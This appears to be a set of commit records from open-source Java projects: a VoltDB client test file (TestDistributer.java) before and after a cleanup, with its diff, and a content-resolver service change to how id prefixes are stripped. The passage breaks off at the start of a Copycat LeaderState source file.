class MockVolt extends Thread { boolean handleConnection = true; MockVolt(int port) throws IOException { network = new VoltNetwork(); network.start(); socket = ServerSocketChannel.open(); socket.configureBlocking(false); socket.socket().bind(new InetSocketAddress(port)); } @Override public void run() { try { while (shutdown.get() == false) { SocketChannel client = socket.accept(); if (client != null) { client.configureBlocking(true); final ByteBuffer lengthBuffer = ByteBuffer.allocate(5);//Extra byte for version also client.read(lengthBuffer); final ByteBuffer serviceLengthBuffer = ByteBuffer.allocate(4); while (serviceLengthBuffer.remaining() > 0) client.read(serviceLengthBuffer); serviceLengthBuffer.flip(); ByteBuffer serviceBuffer = ByteBuffer.allocate(serviceLengthBuffer.getInt()); while (serviceBuffer.remaining() > 0) client.read(serviceBuffer); serviceBuffer.flip(); final ByteBuffer usernameLengthBuffer = ByteBuffer.allocate(4); while (usernameLengthBuffer.remaining() > 0) client.read(usernameLengthBuffer); usernameLengthBuffer.flip(); final int usernameLength = usernameLengthBuffer.getInt(); final ByteBuffer usernameBuffer = ByteBuffer.allocate(usernameLength); while (usernameBuffer.remaining() > 0) client.read(usernameBuffer); usernameBuffer.flip(); final ByteBuffer passwordBuffer = ByteBuffer.allocate(20); while (passwordBuffer.remaining() > 0) client.read(passwordBuffer); passwordBuffer.flip(); final byte usernameBytes[] = new byte[usernameLength]; final byte passwordBytes[] = new byte[20]; usernameBuffer.get(usernameBytes); passwordBuffer.get(passwordBytes); @SuppressWarnings("unused") final String username = new String(usernameBytes); final ByteBuffer responseBuffer = ByteBuffer.allocate(34); responseBuffer.putInt(30); responseBuffer.put((byte)0);//version responseBuffer.put((byte)0);//success response responseBuffer.putInt(0);//hostId responseBuffer.putLong(0);//connectionId responseBuffer.putLong(0);//instanceId responseBuffer.putInt(0);//instanceId pt 2 responseBuffer.putInt(0); responseBuffer.flip(); handler = new MockInputHandler(); client.write(responseBuffer); client.configureBlocking(false); if (handleConnection) { network.registerChannel( client, handler); } } } } catch (IOException e) { e.printStackTrace(); } try { network.shutdown(); } catch (InterruptedException e) { // TODO Auto-generated catch block e.printStackTrace(); } try { socket.close(); } catch (IOException ignored) { } } public void shutdown() { shutdown.set(true); } AtomicBoolean shutdown = new AtomicBoolean(false); volatile ServerSocketChannel socket = null; volatile MockInputHandler handler = null; volatile VoltNetwork network; } private static class CSL implements ClientStatusListener { private volatile boolean m_exceptionHandled = false; @Override public void uncaughtException(ProcedureCallback callback, ClientResponse r, Throwable e) { m_exceptionHandled = true; } @Override public void backpressure(boolean status) { // TODO Auto-generated method stub } @Override public void connectionLost(String hostname, int connectionsLeft) { // TODO Auto-generated method stub } } public class ProcCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { System.err.println("Ran callback."); } } public class ThrowingCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { throw new RuntimeException(); } } @Test public void testCreateConnection() throws Exception { MockVolt volt0 = null; MockVolt volt1 = null; try 
{ // create a fake server and connect to it. volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); assertTrue(volt1.socket.isOpen()); assertTrue(volt0.socket.isOpen()); // And a distributer Distributer dist = new Distributer(); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); Thread.sleep(1000); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } } } @Test public void testQueue() throws Exception { // Uncongested connections get round-robin use. MockVolt volt0, volt1, volt2; int handle = 0; volt0 = volt1 = volt2 = null; try { volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); volt2 = new MockVolt(20002); volt2.start(); CSL csl = new CSL(); Distributer dist = new Distributer(128, null, false, null); dist.addClientStatusListener(csl); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); dist.createConnection("localhost", "", "", 20002); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); assertTrue(volt2.handler != null); ProcedureInvocation pi1 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi2 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi3 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi4 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi5 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi6 = new ProcedureInvocation(++handle, "i1", new Integer(1)); dist.queue(pi1, new ThrowingCallback(), 128, true); dist.drain(); assertTrue(csl.m_exceptionHandled); dist.queue(pi2, new ProcCallback(), 128, true); dist.queue(pi3, new ProcCallback(), 128, true); dist.queue(pi4, new ProcCallback(), 128, true); dist.queue(pi5, new ProcCallback(), 128, true); dist.queue(pi6, new ProcCallback(), 128, true); dist.drain(); System.err.println("Finished drain."); assertEquals(2, volt0.handler.roundTrips.get()); assertEquals(2, volt1.handler.roundTrips.get()); assertEquals(2, volt2.handler.roundTrips.get()); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } if (volt2 != null) { volt2.shutdown(); volt2.join(); } } } public void testClient() throws Exception { MockVolt volt = null; try { // create a fake server and connect to it. volt = new MockVolt(21212); volt.start(); Client clt = ClientFactory.createClient(); clt.createConnection("localhost"); // this call blocks for a result! clt.callProcedure("Foo", new Integer(1)); assertEquals(1, volt.handler.roundTrips.get()); // this call doesn't block! (use drain) clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); clt.drain(); assertEquals(2, volt.handler.roundTrips.get()); } finally { if (volt != null) { volt.shutdown(); volt.join(); } } } @Test public void testClientBlockedOnMaxOutstanding() throws Exception { // create a fake server and connect to it. 
MockVolt volt0 = new MockVolt(20000); volt0.handleConnection = false; try { volt0.start(); ClientConfig config = new ClientConfig(); config.setMaxOutstandingTxns(5); final Client client = ClientFactory.createClient(config); client.createConnection("localhost", 20000); final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); final Thread loadThread = new Thread() { @Override public void run() { try { for (int ii = 0; ii < 6; ii++) { client.callProcedure(new NullCallback(), "foo"); counter.incrementAndGet(); } } catch (Exception e) { e.printStackTrace(); } } }; loadThread.start(); final long start = System.currentTimeMillis(); loadThread.join(300); final long finish = System.currentTimeMillis(); assert(finish - start >= 300); assert(counter.get() == 5); loadThread.stop(); } finally { volt0.shutdown(); } } public void testUnresolvedHost() throws IOException { final String hostname = "doesnotexist"; boolean threwException = false; try { ConnectionUtil.getAuthenticatedConnection(hostname, "", new byte[0], 32); } catch (java.net.UnknownHostException e) { threwException = true; assertTrue(e.getMessage().equals(hostname)); } assertTrue(threwException); } }
tests/frontend/org/voltdb/client/TestDistributer.java
/* This file is part of VoltDB. * Copyright (C) 2008-2010 VoltDB Inc. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. * IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ package org.voltdb.client; import java.io.IOException; import java.net.InetSocketAddress; import java.net.UnknownHostException; import java.nio.ByteBuffer; import java.nio.channels.ServerSocketChannel; import java.nio.channels.SocketChannel; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import junit.framework.TestCase; import org.junit.Test; import org.voltdb.ClientResponseImpl; import org.voltdb.StoredProcedureInvocation; import org.voltdb.VoltTable; import org.voltdb.VoltType; import org.voltdb.messaging.FastDeserializer; import org.voltdb.network.Connection; import org.voltdb.network.QueueMonitor; import org.voltdb.network.VoltNetwork; import org.voltdb.network.VoltProtocolHandler; public class TestDistributer extends TestCase { class MockInputHandler extends VoltProtocolHandler { @Override public int getMaxRead() { return 8192; } @Override public void handleMessage(ByteBuffer message, Connection c) { try { FastDeserializer fds = new FastDeserializer(message); StoredProcedureInvocation spi = fds.readObject(StoredProcedureInvocation.class); VoltTable vt[] = new VoltTable[1]; vt[0] = new VoltTable(new VoltTable.ColumnInfo("Foo", VoltType.BIGINT)); vt[0].addRow(1); ClientResponseImpl response = new ClientResponseImpl(ClientResponseImpl.SUCCESS, vt, "Extra String", spi.getClientHandle()); c.writeStream().enqueue(response); roundTrips.incrementAndGet(); System.err.println("Sending response."); } catch (Exception ex) { ex.printStackTrace(); } } @Override public int getExpectedOutgoingMessageSize() { return 2048; } @Override public void started(Connection c) { // TODO Auto-generated method stub } @Override public void starting(Connection c) { // TODO Auto-generated method stub } @Override public void stopped(Connection c) { // TODO Auto-generated method stub } @Override public void stopping(Connection c) { // TODO Auto-generated method stub } AtomicInteger roundTrips = new AtomicInteger(); @Override public Runnable offBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public Runnable onBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public QueueMonitor writestreamMonitor() { return null; } } // A fake server. 
class MockVolt extends Thread { boolean handleConnection = true; MockVolt(int port) { try { network = new VoltNetwork(); network.start(); socket = ServerSocketChannel.open(); socket.configureBlocking(false); socket.socket().bind(new InetSocketAddress(port)); } catch (IOException e) { e.printStackTrace(); } } @Override public void run() { try { while (shutdown.get() == false) { SocketChannel client = socket.accept(); if (client != null) { client.configureBlocking(true); final ByteBuffer lengthBuffer = ByteBuffer.allocate(5);//Extra byte for version also client.read(lengthBuffer); final ByteBuffer serviceLengthBuffer = ByteBuffer.allocate(4); while (serviceLengthBuffer.remaining() > 0) client.read(serviceLengthBuffer); serviceLengthBuffer.flip(); ByteBuffer serviceBuffer = ByteBuffer.allocate(serviceLengthBuffer.getInt()); while (serviceBuffer.remaining() > 0) client.read(serviceBuffer); serviceBuffer.flip(); final ByteBuffer usernameLengthBuffer = ByteBuffer.allocate(4); while (usernameLengthBuffer.remaining() > 0) client.read(usernameLengthBuffer); usernameLengthBuffer.flip(); final int usernameLength = usernameLengthBuffer.getInt(); final ByteBuffer usernameBuffer = ByteBuffer.allocate(usernameLength); while (usernameBuffer.remaining() > 0) client.read(usernameBuffer); usernameBuffer.flip(); final ByteBuffer passwordBuffer = ByteBuffer.allocate(20); while (passwordBuffer.remaining() > 0) client.read(passwordBuffer); passwordBuffer.flip(); final byte usernameBytes[] = new byte[usernameLength]; final byte passwordBytes[] = new byte[20]; usernameBuffer.get(usernameBytes); passwordBuffer.get(passwordBytes); @SuppressWarnings("unused") final String username = new String(usernameBytes); final ByteBuffer responseBuffer = ByteBuffer.allocate(34); responseBuffer.putInt(30); responseBuffer.put((byte)0);//version responseBuffer.put((byte)0);//success response responseBuffer.putInt(0);//hostId responseBuffer.putLong(0);//connectionId responseBuffer.putLong(0);//instanceId responseBuffer.putInt(0);//instanceId pt 2 responseBuffer.putInt(0); responseBuffer.flip(); handler = new MockInputHandler(); client.write(responseBuffer); client.configureBlocking(false); if (handleConnection) { network.registerChannel( client, handler); } } } } catch (IOException e) { e.printStackTrace(); } try { network.shutdown(); } catch (InterruptedException e) { // TODO Auto-generated catch block e.printStackTrace(); } try { socket.close(); } catch (IOException ignored) { } } public void shutdown() { shutdown.set(true); } AtomicBoolean shutdown = new AtomicBoolean(false); volatile ServerSocketChannel socket = null; volatile MockInputHandler handler = null; volatile VoltNetwork network; } private static class CSL implements ClientStatusListener { private volatile boolean m_exceptionHandled = false; @Override public void uncaughtException(ProcedureCallback callback, ClientResponse r, Throwable e) { m_exceptionHandled = true; } @Override public void backpressure(boolean status) { // TODO Auto-generated method stub } @Override public void connectionLost(String hostname, int connectionsLeft) { // TODO Auto-generated method stub } } public class ProcCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { System.err.println("Ran callback."); } } public class ThrowingCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { throw new RuntimeException(); } } @Test public void testCreateConnection() throws InterruptedException { 
MockVolt volt0 = null; MockVolt volt1 = null; // create a fake server and connect to it. volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); assertTrue(volt1.socket.isOpen()); assertTrue(volt0.socket.isOpen()); // And a distributer Distributer dist = new Distributer(); try { dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); } catch (UnknownHostException e) { e.printStackTrace(); fail(); } catch (IOException e) { e.printStackTrace(); fail(); } Thread.sleep(1000); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } } @Test public void testQueue() throws Exception { // Uncongested connections get round-robin use. MockVolt volt0, volt1, volt2; int handle = 0; volt0 = volt1 = volt2 = null; try { volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); volt2 = new MockVolt(20002); volt2.start(); CSL csl = new CSL(); Distributer dist = new Distributer(128, null, false, null); dist.addClientStatusListener(csl); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); dist.createConnection("localhost", "", "", 20002); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); assertTrue(volt2.handler != null); ProcedureInvocation pi1 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi2 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi3 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi4 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi5 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi6 = new ProcedureInvocation(++handle, "i1", new Integer(1)); dist.queue(pi1, new ThrowingCallback(), 128, true); dist.drain(); assertTrue(csl.m_exceptionHandled); dist.queue(pi2, new ProcCallback(), 128, true); dist.queue(pi3, new ProcCallback(), 128, true); dist.queue(pi4, new ProcCallback(), 128, true); dist.queue(pi5, new ProcCallback(), 128, true); dist.queue(pi6, new ProcCallback(), 128, true); dist.drain(); System.err.println("Finished drain."); assertEquals(2, volt0.handler.roundTrips.get()); assertEquals(2, volt1.handler.roundTrips.get()); assertEquals(2, volt2.handler.roundTrips.get()); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } if (volt2 != null) { volt2.shutdown(); volt2.join(); } } } public void testClient() { MockVolt volt = null; try { // create a fake server and connect to it. volt = new MockVolt(21212); volt.start(); Client clt = ClientFactory.createClient(); clt.createConnection("localhost"); // this call blocks for a result! clt.callProcedure("Foo", new Integer(1)); assertEquals(1, volt.handler.roundTrips.get()); // this call doesn't block! (use drain) clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); clt.drain(); assertEquals(2, volt.handler.roundTrips.get()); } catch (Exception e) { e.printStackTrace(); fail(); } finally { try { if (volt != null) { volt.shutdown(); volt.join(); } } catch(Exception ignored) { ignored.printStackTrace(); } } } @Test public void testClientBlockedOnMaxOutstanding() throws Exception { // create a fake server and connect to it. 
MockVolt volt0 = new MockVolt(20000); volt0.handleConnection = false; volt0.start(); ClientConfig config = new ClientConfig(); config.setMaxOutstandingTxns(5); final Client client = ClientFactory.createClient(config); client.createConnection("localhost", 20000); final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); final Thread loadThread = new Thread() { @Override public void run() { try { for (int ii = 0; ii < 6; ii++) { client.callProcedure(new NullCallback(), "foo"); counter.incrementAndGet(); } } catch (Exception e) { e.printStackTrace(); } } }; loadThread.start(); final long start = System.currentTimeMillis(); loadThread.join(300); final long finish = System.currentTimeMillis(); assert(finish - start >= 300); assert(counter.get() == 5); volt0.shutdown(); loadThread.stop(); } public void testUnresolvedHost() throws IOException { final String hostname = "doesnotexist"; boolean threwException = false; try { ConnectionUtil.getAuthenticatedConnection(hostname, "", new byte[0], 32); } catch (java.net.UnknownHostException e) { threwException = true; assertTrue(e.getMessage().equals(hostname)); } assertTrue(threwException); } }
Clean up intermittent test case somewhat. 1. Close all volt instances using finally blocks. 2. Let test cases throw instead of swallowing exceptions.
tests/frontend/org/voltdb/client/TestDistributer.java
Clean up intermittent test case somewhat.
<ide><path>ests/frontend/org/voltdb/client/TestDistributer.java <ide> <ide> import java.io.IOException; <ide> import java.net.InetSocketAddress; <del>import java.net.UnknownHostException; <ide> import java.nio.ByteBuffer; <ide> import java.nio.channels.ServerSocketChannel; <ide> import java.nio.channels.SocketChannel; <ide> // A fake server. <ide> class MockVolt extends Thread { <ide> boolean handleConnection = true; <del> MockVolt(int port) { <del> try { <del> network = new VoltNetwork(); <del> network.start(); <del> socket = ServerSocketChannel.open(); <del> socket.configureBlocking(false); <del> socket.socket().bind(new InetSocketAddress(port)); <del> } catch (IOException e) { <del> e.printStackTrace(); <del> } <add> MockVolt(int port) throws IOException { <add> network = new VoltNetwork(); <add> network.start(); <add> socket = ServerSocketChannel.open(); <add> socket.configureBlocking(false); <add> socket.socket().bind(new InetSocketAddress(port)); <ide> } <ide> <ide> @Override <ide> <ide> <ide> @Test <del> public void testCreateConnection() throws InterruptedException { <add> public void testCreateConnection() throws Exception { <ide> MockVolt volt0 = null; <ide> MockVolt volt1 = null; <del> <del> // create a fake server and connect to it. <del> volt0 = new MockVolt(20000); <del> volt0.start(); <del> <del> volt1 = new MockVolt(20001); <del> volt1.start(); <del> <del> assertTrue(volt1.socket.isOpen()); <del> assertTrue(volt0.socket.isOpen()); <del> <del> // And a distributer <del> Distributer dist = new Distributer(); <ide> try { <add> // create a fake server and connect to it. <add> volt0 = new MockVolt(20000); <add> volt0.start(); <add> <add> volt1 = new MockVolt(20001); <add> volt1.start(); <add> <add> assertTrue(volt1.socket.isOpen()); <add> assertTrue(volt0.socket.isOpen()); <add> <add> // And a distributer <add> Distributer dist = new Distributer(); <ide> dist.createConnection("localhost", "", "", 20000); <ide> dist.createConnection("localhost", "", "", 20001); <del> } catch (UnknownHostException e) { <del> e.printStackTrace(); <del> fail(); <del> } catch (IOException e) { <del> e.printStackTrace(); <del> fail(); <del> } <del> <del> Thread.sleep(1000); <del> assertTrue(volt1.handler != null); <del> assertTrue(volt0.handler != null); <del> <del> if (volt0 != null) { <del> volt0.shutdown(); <del> volt0.join(); <del> } <del> if (volt1 != null) { <del> volt1.shutdown(); <del> volt1.join(); <add> <add> Thread.sleep(1000); <add> assertTrue(volt1.handler != null); <add> assertTrue(volt0.handler != null); <add> } <add> finally { <add> if (volt0 != null) { <add> volt0.shutdown(); <add> volt0.join(); <add> } <add> if (volt1 != null) { <add> volt1.shutdown(); <add> volt1.join(); <add> } <ide> } <ide> } <ide> <ide> } <ide> } <ide> <del> public void testClient() { <add> public void testClient() throws Exception { <ide> MockVolt volt = null; <ide> <del> try { <del> // create a fake server and connect to it. <del> volt = new MockVolt(21212); <del> volt.start(); <del> <del> Client clt = ClientFactory.createClient(); <del> clt.createConnection("localhost"); <del> <del> // this call blocks for a result! <del> clt.callProcedure("Foo", new Integer(1)); <del> assertEquals(1, volt.handler.roundTrips.get()); <del> <del> // this call doesn't block! 
(use drain) <del> clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); <del> clt.drain(); <del> assertEquals(2, volt.handler.roundTrips.get()); <del> <del> } catch (Exception e) { <del> e.printStackTrace(); <del> fail(); <del> } <del> finally { <del> try { <del> if (volt != null) { <del> volt.shutdown(); <del> volt.join(); <del> } <del> } catch(Exception ignored) { <del> ignored.printStackTrace(); <del> } <del> } <add> try { <add> // create a fake server and connect to it. <add> volt = new MockVolt(21212); <add> volt.start(); <add> <add> Client clt = ClientFactory.createClient(); <add> clt.createConnection("localhost"); <add> <add> // this call blocks for a result! <add> clt.callProcedure("Foo", new Integer(1)); <add> assertEquals(1, volt.handler.roundTrips.get()); <add> <add> // this call doesn't block! (use drain) <add> clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); <add> clt.drain(); <add> assertEquals(2, volt.handler.roundTrips.get()); <add> } <add> finally { <add> if (volt != null) { <add> volt.shutdown(); <add> volt.join(); <add> } <add> } <ide> } <ide> <ide> @Test <ide> // create a fake server and connect to it. <ide> MockVolt volt0 = new MockVolt(20000); <ide> volt0.handleConnection = false; <del> volt0.start(); <del> <del> ClientConfig config = new ClientConfig(); <del> config.setMaxOutstandingTxns(5); <del> <del> final Client client = ClientFactory.createClient(config); <del> client.createConnection("localhost", 20000); <del> <del> final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); <del> final Thread loadThread = new Thread() { <del> @Override <del> public void run() { <del> try { <del> for (int ii = 0; ii < 6; ii++) { <del> client.callProcedure(new NullCallback(), "foo"); <del> counter.incrementAndGet(); <add> try { <add> volt0.start(); <add> <add> ClientConfig config = new ClientConfig(); <add> config.setMaxOutstandingTxns(5); <add> <add> final Client client = ClientFactory.createClient(config); <add> client.createConnection("localhost", 20000); <add> <add> final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); <add> final Thread loadThread = new Thread() { <add> @Override <add> public void run() { <add> try { <add> for (int ii = 0; ii < 6; ii++) { <add> client.callProcedure(new NullCallback(), "foo"); <add> counter.incrementAndGet(); <add> } <add> } catch (Exception e) { <add> e.printStackTrace(); <ide> } <del> } catch (Exception e) { <del> e.printStackTrace(); <ide> } <del> } <del> }; <del> loadThread.start(); <del> <del> final long start = System.currentTimeMillis(); <del> loadThread.join(300); <del> final long finish = System.currentTimeMillis(); <del> assert(finish - start >= 300); <del> assert(counter.get() == 5); <del> volt0.shutdown(); <del> loadThread.stop(); <add> }; <add> loadThread.start(); <add> <add> final long start = System.currentTimeMillis(); <add> loadThread.join(300); <add> final long finish = System.currentTimeMillis(); <add> assert(finish - start >= 300); <add> assert(counter.get() == 5); <add> loadThread.stop(); <add> } <add> finally { <add> volt0.shutdown(); <add> } <ide> } <ide> <ide> public void testUnresolvedHost() throws IOException {
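The diff above converts the Distributer tests to the structure the commit message describes: test methods declare "throws Exception" so failures surface to JUnit directly, and each fake server is released in a finally block. The following is a rough, non-authoritative sketch of that shape only, not part of the original change; it assumes the same package and JUnit imports as TestDistributer.java, and MockVolt, Client, ClientFactory, and the "Foo" procedure name are reused from the test above, while the class name is made up.

package org.voltdb.client;

import static org.junit.Assert.assertTrue;

import org.junit.Test;

// Illustrative sketch only -- not part of the commit above.
public class CleanupPatternSketch {

    @Test
    public void testWithGuaranteedCleanup() throws Exception {
        MockVolt volt = null;
        try {
            // MockVolt(int) now throws IOException instead of swallowing it,
            // so a failed bind fails the test immediately.
            volt = new MockVolt(21212);
            volt.start();

            Client clt = ClientFactory.createClient();
            clt.createConnection("localhost");

            // Blocking round trip against the fake server.
            clt.callProcedure("Foo", new Integer(1));
            assertTrue(volt.socket.isOpen());
        } finally {
            // Runs whether the body returns or throws, so the port and the
            // fake server's threads are always released for the next test.
            if (volt != null) {
                volt.shutdown();
                volt.join();
            }
        }
    }
}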
Java
apache-2.0
49d2f6e16157d3e67ab2447407ef4118685a8dec
0
statsbiblioteket/content-resolver
package dk.statsbiblioteket.medieplatform.contentresolver.service; /* * #%L * content-resolver-service * %% * Copyright (C) 2012 The State and University Library, Denmark * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import dk.statsbiblioteket.medieplatform.contentresolver.lib.ConfigurableContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.lib.ContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.model.Content; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; import java.util.HashMap; import java.util.List; import java.util.Map; @Path("/") public class ContentResolverService { private final ContentResolver contentResolver; public ContentResolverService() { this.contentResolver = new ConfigurableContentResolver(); } /** * Given a PID, return a list of content disseminations. * * @param ids The ids of the content to lookup. * @return Dissemination of the content. */ @GET @Path("content/") //@Produces({"application/json"}) @Produces(MediaType.APPLICATION_JSON) public Map<String,Content> getContent(@QueryParam("id") List<String> ids) { Map<String,Content> idContentPairs = new HashMap<String,Content>(); for (String id : ids) { String originalId = id; Content content = new Content(); // Remove prefixed "uuid:" if it is there if (id.contains(":")) { id = id.substring(id.lastIndexOf(':') + 1); } content.setResources(contentResolver.getContent(id) .getResources()); idContentPairs.put(originalId, content); } return idContentPairs; } }
content-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java
package dk.statsbiblioteket.medieplatform.contentresolver.service; /* * #%L * content-resolver-service * %% * Copyright (C) 2012 The State and University Library, Denmark * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import dk.statsbiblioteket.medieplatform.contentresolver.lib.ConfigurableContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.lib.ContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.model.Content; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; import java.util.HashMap; import java.util.List; import java.util.Map; @Path("/") public class ContentResolverService { private final ContentResolver contentResolver; public ContentResolverService() { this.contentResolver = new ConfigurableContentResolver(); } /** * Given a PID, return a list of content disseminations. * * @param ids The ids of the content to lookup. * @return Dissemination of the content. */ @GET @Path("content/") //@Produces({"application/json"}) @Produces(MediaType.APPLICATION_JSON) public Map<String,Content> getContent(@QueryParam("id") List<String> ids) { Map<String,Content> idContentPairs = new HashMap<String,Content>(); for (String id : ids) { String originalId = id; Content content = new Content(); // Remove prefixed "uuid:" if it is there if (id.contains(":")) { id = id.substring(id.indexOf(':') + 1); } content.setResources(contentResolver.getContent(id) .getResources()); idContentPairs.put(originalId, content); } return idContentPairs; } }
Ignore the entire prefix of ids, not just up to the first ':'
content-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java
Ignore the entire prefix of ids, not just up to the first ':'
<ide><path>content-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java <ide> Content content = new Content(); <ide> // Remove prefixed "uuid:" if it is there <ide> if (id.contains(":")) { <del> id = id.substring(id.indexOf(':') + 1); <add> id = id.substring(id.lastIndexOf(':') + 1); <ide> } <ide> <ide> content.setResources(contentResolver.getContent(id)
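The single changed line above is the whole behavioral fix: switching from indexOf to lastIndexOf makes the resolver strip every prefixed segment of the id, not just the first one. Below is a minimal standalone sketch of the difference; the id value and class name are made up for illustration and do not come from the repository.

public class PrefixStripDemo {
    public static void main(String[] args) {
        // Hypothetical id with two prefixed segments (value is made up).
        String id = "doms:uuid:0f3a6a10-1234-5678-9abc-def012345678";

        // Old behaviour: only the first segment is removed, "uuid:" remains.
        String untilFirstColon = id.substring(id.indexOf(':') + 1);

        // New behaviour: everything up to the last ':' is removed.
        String afterLastColon = id.substring(id.lastIndexOf(':') + 1);

        System.out.println(untilFirstColon); // uuid:0f3a6a10-1234-5678-9abc-def012345678
        System.out.println(afterLastColon);  // 0f3a6a10-1234-5678-9abc-def012345678
    }
}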
Java
apache-2.0
74ede115169a4ecdef0b6f7fcc5f6c2fe8a3a78f
0
atomix/copycat,atomix/copycat
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.atomix.copycat.server.state; import io.atomix.catalyst.concurrent.ComposableFuture; import io.atomix.catalyst.concurrent.Scheduled; import io.atomix.catalyst.transport.Connection; import io.atomix.catalyst.util.Assert; import io.atomix.copycat.Command; import io.atomix.copycat.Query; import io.atomix.copycat.error.CopycatError; import io.atomix.copycat.error.CopycatException; import io.atomix.copycat.protocol.*; import io.atomix.copycat.server.CopycatServer; import io.atomix.copycat.server.cluster.Member; import io.atomix.copycat.server.protocol.*; import io.atomix.copycat.server.storage.entry.*; import io.atomix.copycat.server.storage.system.Configuration; import io.atomix.copycat.session.Session; import java.time.Duration; import java.time.Instant; import java.util.Collection; import java.util.concurrent.CompletableFuture; import java.util.concurrent.CompletionException; import java.util.stream.Collectors; /** * Leader state. * * @author <a href="http://github.com/kuujo">Jordan Halterman</a> */ final class LeaderState extends ActiveState { // Max request queue size *per session* - necessary to limit the stack size private static final int 